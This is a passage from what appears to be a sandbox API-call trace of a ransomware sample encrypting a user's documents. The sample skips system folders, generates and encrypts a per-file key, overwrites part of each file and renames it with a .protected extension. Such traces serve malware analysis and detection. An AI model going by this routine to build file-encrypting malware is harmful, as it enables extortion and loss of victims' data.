returned 1 [0091.362] lstrcmpiW (lpString1="13xVlsU1C8IiFYf W.docx", lpString2="System Volume Information") returned -1 [0091.362] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\13xVlsU1C8IiFYf W.docx") returned 73 [0091.362] StrStrIW (lpFirst="13xVlsU1C8IiFYf W.docx", lpSrch=".protected") returned 0x0 [0091.362] lstrcmpW (lpString1="13xVlsU1C8IiFYf W.docx", lpString2="RESTORE_FILES.txt") returned -1 [0091.362] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.362] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.362] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\13xVlsU1C8IiFYf W.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\13xvlsu1c8iifyf w.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.362] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\13xVlsU1C8IiFYf W.docx") returned 73 [0091.362] StrStrW (lpFirst="13xVlsU1C8IiFYf W.docx", lpSrch=".txt") returned 0x0 [0091.362] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\13xVlsU1C8IiFYf W.docx") returned 73 [0091.363] StrStrW (lpFirst="13xVlsU1C8IiFYf W.docx", lpSrch=".rar") returned 0x0 [0091.363] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\13xVlsU1C8IiFYf W.docx") returned 73 [0091.363] StrStrW (lpFirst="13xVlsU1C8IiFYf W.docx", lpSrch=".zip") returned 0x0 [0091.363] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.363] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.363] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.364] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.364] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.364] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.364] CloseHandle (hObject=0xd4) returned 1 [0091.364] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\13xVlsU1C8IiFYf W.docx.protected") returned 83 [0091.365] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\13xVlsU1C8IiFYf W.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\13xvlsu1c8iifyf w.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\13xVlsU1C8IiFYf W.docx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\13xvlsu1c8iifyf w.docx.protected")) returned 1 [0091.365] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.365] lstrcmpiW (lpString1="1tG-DEIatP.pps", lpString2="Windows") returned -1 [0091.365] lstrcmpiW (lpString1="1tG-DEIatP.pps", lpString2="Program Files") returned -1 [0091.365] lstrcmpiW (lpString1="1tG-DEIatP.pps", lpString2="Program Files (x86)") returned -1 [0091.365] lstrcmpiW (lpString1="1tG-DEIatP.pps", lpString2="$Recycle.bin") returned 1 [0091.365] lstrcmpiW (lpString1="1tG-DEIatP.pps", lpString2="System Volume Information") returned -1 [0091.365] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\1tG-DEIatP.pps") returned 64 [0091.365] StrStrIW (lpFirst="1tG-DEIatP.pps", lpSrch=".protected") returned 0x0 [0091.365] lstrcmpW (lpString1="1tG-DEIatP.pps", lpString2="RESTORE_FILES.txt") returned -1 [0091.365] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.365] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\1tG-DEIatP.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\1tg-deiatp.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.366] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\1tG-DEIatP.pps") returned 64 [0091.366] StrStrW (lpFirst="1tG-DEIatP.pps", lpSrch=".txt") returned 0x0 [0091.366] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\1tG-DEIatP.pps") returned 64 [0091.366] StrStrW (lpFirst="1tG-DEIatP.pps", lpSrch=".rar") returned 0x0 [0091.366] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\1tG-DEIatP.pps") returned 64 [0091.366] StrStrW (lpFirst="1tG-DEIatP.pps", lpSrch=".zip") returned 0x0 [0091.366] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.366] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.367] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.367] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.367] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.367] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.367] CloseHandle (hObject=0xd4) returned 1 [0091.368] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\1tG-DEIatP.pps.protected") returned 74 [0091.368] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\1tG-DEIatP.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\1tg-deiatp.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\1tG-DEIatP.pps.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\1tg-deiatp.pps.protected")) returned 1 [0091.368] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.368] lstrcmpiW (lpString1="3jKwHD1etBvoBi.ods", lpString2="Windows") returned -1 [0091.368] lstrcmpiW (lpString1="3jKwHD1etBvoBi.ods", lpString2="Program Files") returned -1 [0091.368] lstrcmpiW (lpString1="3jKwHD1etBvoBi.ods", lpString2="Program Files (x86)") returned -1 [0091.368] lstrcmpiW (lpString1="3jKwHD1etBvoBi.ods", lpString2="$Recycle.bin") returned 1 [0091.368] lstrcmpiW (lpString1="3jKwHD1etBvoBi.ods", lpString2="System Volume Information") returned -1 [0091.369] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\3jKwHD1etBvoBi.ods") returned 68 [0091.369] StrStrIW (lpFirst="3jKwHD1etBvoBi.ods", lpSrch=".protected") returned 0x0 [0091.369] lstrcmpW (lpString1="3jKwHD1etBvoBi.ods", lpString2="RESTORE_FILES.txt") returned -1 [0091.369] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.369] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\3jKwHD1etBvoBi.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\3jkwhd1etbvobi.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.369] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\3jKwHD1etBvoBi.ods") returned 68 [0091.369] StrStrW (lpFirst="3jKwHD1etBvoBi.ods", lpSrch=".txt") returned 0x0 [0091.369] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\3jKwHD1etBvoBi.ods") returned 68 [0091.369] StrStrW (lpFirst="3jKwHD1etBvoBi.ods", lpSrch=".rar") returned 0x0 [0091.369] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\3jKwHD1etBvoBi.ods") returned 68 [0091.369] StrStrW (lpFirst="3jKwHD1etBvoBi.ods", lpSrch=".zip") returned 0x0 [0091.369] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.370] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.370] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.370] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.370] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.371] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.371] CloseHandle (hObject=0xd4) returned 1 [0091.371] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\3jKwHD1etBvoBi.ods.protected") returned 78 [0091.371] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\3jKwHD1etBvoBi.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\3jkwhd1etbvobi.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\3jKwHD1etBvoBi.ods.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\3jkwhd1etbvobi.ods.protected")) returned 1 [0091.372] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.372] lstrcmpiW (lpString1="Ctip.ppt", lpString2="Windows") returned -1 [0091.372] lstrcmpiW (lpString1="Ctip.ppt", lpString2="Program Files") returned -1 [0091.372] lstrcmpiW (lpString1="Ctip.ppt", lpString2="Program Files (x86)") returned -1 [0091.372] lstrcmpiW (lpString1="Ctip.ppt", lpString2="$Recycle.bin") returned 1 [0091.372] lstrcmpiW (lpString1="Ctip.ppt", lpString2="System Volume Information") returned -1 [0091.372] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ctip.ppt") returned 58 [0091.372] StrStrIW (lpFirst="Ctip.ppt", lpSrch=".protected") returned 0x0 [0091.372] lstrcmpW (lpString1="Ctip.ppt", lpString2="RESTORE_FILES.txt") returned -1 [0091.372] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.372] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.372] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ctip.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\ctip.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.373] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ctip.ppt") returned 58 [0091.373] StrStrW (lpFirst="Ctip.ppt", lpSrch=".txt") returned 0x0 [0091.373] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ctip.ppt") returned 58 [0091.373] StrStrW (lpFirst="Ctip.ppt", lpSrch=".rar") returned 0x0 [0091.373] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ctip.ppt") returned 58 [0091.373] StrStrW (lpFirst="Ctip.ppt", lpSrch=".zip") returned 0x0 [0091.373] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.374] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.374] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.374] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.374] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.374] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.375] CloseHandle (hObject=0xd4) returned 1 [0091.375] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ctip.ppt.protected") returned 68 [0091.375] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ctip.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\ctip.ppt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ctip.ppt.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\ctip.ppt.protected")) returned 1 [0091.376] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.376] lstrcmpiW (lpString1="fP3R PjQkBuI-4.pptx", lpString2="Windows") returned -1 [0091.376] lstrcmpiW (lpString1="fP3R PjQkBuI-4.pptx", lpString2="Program Files") returned -1 [0091.376] lstrcmpiW (lpString1="fP3R PjQkBuI-4.pptx", lpString2="Program Files (x86)") returned -1 [0091.376] lstrcmpiW (lpString1="fP3R PjQkBuI-4.pptx", lpString2="$Recycle.bin") returned 1 [0091.376] lstrcmpiW (lpString1="fP3R PjQkBuI-4.pptx", lpString2="System Volume Information") returned -1 [0091.376] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\fP3R PjQkBuI-4.pptx") returned 70 [0091.376] StrStrIW (lpFirst="fP3R PjQkBuI-4.pptx", lpSrch=".protected") returned 0x0 [0091.376] lstrcmpW (lpString1="fP3R PjQkBuI-4.pptx", lpString2="RESTORE_FILES.txt") returned -1 [0091.376] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.376] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.376] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\fP3R PjQkBuI-4.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\fp3r pjqkbui-4.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.377] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\fP3R PjQkBuI-4.pptx") returned 70 [0091.377] StrStrW (lpFirst="fP3R PjQkBuI-4.pptx", lpSrch=".txt") returned 0x0 [0091.377] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\fP3R PjQkBuI-4.pptx") returned 70 [0091.377] StrStrW (lpFirst="fP3R PjQkBuI-4.pptx", lpSrch=".rar") returned 0x0 [0091.377] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\fP3R PjQkBuI-4.pptx") returned 70 [0091.377] StrStrW (lpFirst="fP3R PjQkBuI-4.pptx", lpSrch=".zip") returned 0x0 [0091.377] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.378] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.378] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.378] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.378] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.378] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.378] CloseHandle (hObject=0xd4) returned 1 [0091.379] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\fP3R PjQkBuI-4.pptx.protected") returned 80 [0091.379] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\fP3R PjQkBuI-4.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\fp3r pjqkbui-4.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\fP3R PjQkBuI-4.pptx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\fp3r pjqkbui-4.pptx.protected")) returned 1 [0091.380] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.380] lstrcmpiW (lpString1="J2Md7SeLwOtzt.pptx", lpString2="Windows") returned -1 [0091.380] lstrcmpiW (lpString1="J2Md7SeLwOtzt.pptx", lpString2="Program Files") returned -1 [0091.380] lstrcmpiW (lpString1="J2Md7SeLwOtzt.pptx", lpString2="Program Files (x86)") returned -1 [0091.380] lstrcmpiW (lpString1="J2Md7SeLwOtzt.pptx", lpString2="$Recycle.bin") returned 1 [0091.380] lstrcmpiW (lpString1="J2Md7SeLwOtzt.pptx", lpString2="System Volume Information") returned -1 [0091.380] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\J2Md7SeLwOtzt.pptx") returned 68 [0091.380] StrStrIW (lpFirst="J2Md7SeLwOtzt.pptx", lpSrch=".protected") returned 0x0 [0091.380] lstrcmpW (lpString1="J2Md7SeLwOtzt.pptx", lpString2="RESTORE_FILES.txt") returned -1 [0091.380] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.380] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\J2Md7SeLwOtzt.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\j2md7selwotzt.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\J2Md7SeLwOtzt.pptx") returned 68 [0091.380] StrStrW (lpFirst="J2Md7SeLwOtzt.pptx", lpSrch=".txt") returned 0x0 [0091.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\J2Md7SeLwOtzt.pptx") returned 68 [0091.380] StrStrW (lpFirst="J2Md7SeLwOtzt.pptx", lpSrch=".rar") returned 0x0 [0091.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\J2Md7SeLwOtzt.pptx") returned 68 [0091.380] StrStrW (lpFirst="J2Md7SeLwOtzt.pptx", lpSrch=".zip") returned 0x0 [0091.380] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.381] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.381] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.382] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.382] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.382] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 